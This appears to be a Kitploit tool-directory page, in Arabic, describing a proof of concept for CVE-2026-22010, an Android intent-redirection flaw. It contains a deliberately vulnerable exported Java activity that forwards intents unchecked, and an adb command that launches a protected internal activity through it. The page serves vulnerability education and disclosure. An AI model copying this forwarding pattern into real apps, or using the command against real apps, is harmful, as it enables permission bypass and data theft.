Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالاختبار اختراق تطبيقات الجوالأمن الجوالالتعلم والتعليم
GitHubgeorge0papasotiriou/cve-2026-22010-android-intent-redirection-to-exported-component

CVE-2026-22010-Android-Intent-Redirection-to-Exported-Component

إثبات مفهوم لثغرة CVE-2026-22010 الخاصة بإعادة توجيه Intent في أندرويد: يوضح نشاطًا مُصدَّرًا يعيد توجيه الـ Intents إلى مكونات داخلية يتحكم فيها المهاجم، متجاوزًا فحوصات الأذونات، مع كود Java هش وخطوات استغلال عبر adb.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
13منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-22010 – إعادة توجيه Intent في Android إلى مكوّن مُصدَّر

برنامج توضيحي (محاكاة Java/Android)

root@kitploit:~
// VulnActivity.java - Exported activity that forwards intents
public class VulnActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        Intent incoming = getIntent();
        // Retrieve target component from extras
        String targetPkg = incoming.getStringExtra("pkg");
        String targetCls = incoming.getStringExtra("cls");
        Intent forward = new Intent();
        forward.setClassName(targetPkg, targetCls);
        // Copy all extras from original intent
        forward.putExtras(incoming);
        startActivity(forward);
    }
}

CVE-2026-22010 – إعادة توجيه Intent في Android إلى مكوّن مُصدَّر

Severity: High

نظرة عامة

نشاط Android مُصدَّر يعيد توجيه الـ Intent الواردة بشكل أعمى إلى مكوّن محدد في extras الخاصة بالـ Intent. يمكن للمهاجم صياغة Intent تؤدي إلى قيام التطبيق بتشغيل نشاط داخلي محمي ببيانات يتحكم بها المهاجم، متجاوزًا فحوصات الأذونات.

تفاصيل الثغرة

  • النوع: إعادة توجيه Intent / تجاوز الأذونات
  • التأثير: الوصول إلى مكوّنات خاصة، سرقة بيانات.
  • السبب الجذري: لا يتحقق التطبيق من المكوّن الهدف (اسم الحزمة واسم الفئة) قبل تمرير الـ Intent.

عرض الاستغلال

انشر التطبيق المعرّض للثغرة على محاكي Android. أرسِل Intent عبر adb:

root@kitploit:~
adb shell am start -n com.example/.VulnActivity --es pkg com.example.internal --es cls com.example.SecretActivity

يتم تشغيل النشاط الداخلي دون الأذونات المناسبة.

تنزيل الأداة